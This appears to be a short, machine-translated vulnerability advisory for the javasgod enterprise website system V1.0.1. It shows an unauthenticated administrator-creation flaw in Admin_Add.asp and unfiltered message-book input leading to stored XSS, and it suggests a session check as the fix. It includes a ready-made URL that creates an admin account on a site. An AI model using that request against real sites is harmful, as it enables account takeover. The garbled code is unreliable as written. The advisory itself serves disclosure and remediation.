Javasgod free enterprise website building system V1.0.1 add administrator and message book XSS

Affected Versions: javasgod free enterprise website building system V1.0.1
 
Source code: http://www.mycodes.net/25/5242.htm
 
① Add an administrator without verification
 
Vulnerability file: Admin_Add.asp
 
Vulnerability code:
 
<! -- # Include file = ".../../config/conn. asp" -->
<! -- # Include file = "md5.asp" -->
<%
If request. QueryString ("action") = "save" then
Uid = replace (trim (Request ("uid ")),"'","")
Realname = replace (trim (Request ("realname ")),"'","")
Pwd1 = replace (trim (Request ("pwd1 ")),"'","")
Pwd2 = replace (trim (Request ("pwd2 ")),"'","")
Password = md5 (pwd1) cause: data is directly written without verification
 
Scheme: Construct a URL
 
Http://www.bkjia.com/source/admin/Admin_Add.asp? Action = save & uid = test & realname = test & pwd1 = 123456 & pwd2 = 123456
 
In this way, you can add an administrator account whose account is test and password is 123456.
 
Solution: Add judgment code
 
If session ("admin") = "" then
Response. Write "<script language = 'javascript '> alert ('network timed out or you have not logged on yet! '); Window. location. href = 'login. asp'; </script>"
Response. End
End if ② message book XSS Vulnerability
 
Vulnerability file: Message. asp
 
Vulnerability code:
 
If request. QueryString ("action") = "save" then
Username = trim (request ("username "))
Email = trim (request ("email "))
Tel = trim (request ("tel "))
Zhiwu = trim (request ("zhiwu "))
City = trim (request ("city "))
Qq = trim (request ("qq "))
Add = trim (request ("add "))
Title = trim (request ("title "))
Content = trim (request ("content "))
Messageip = Request. ServerVariables ("REMOTE_ADDR ")
Set rs = server. CreateObject ("adodb. recordset ")
Rs. open "select * from consumer _message", conn, reason: not filtered, can still be executed in the background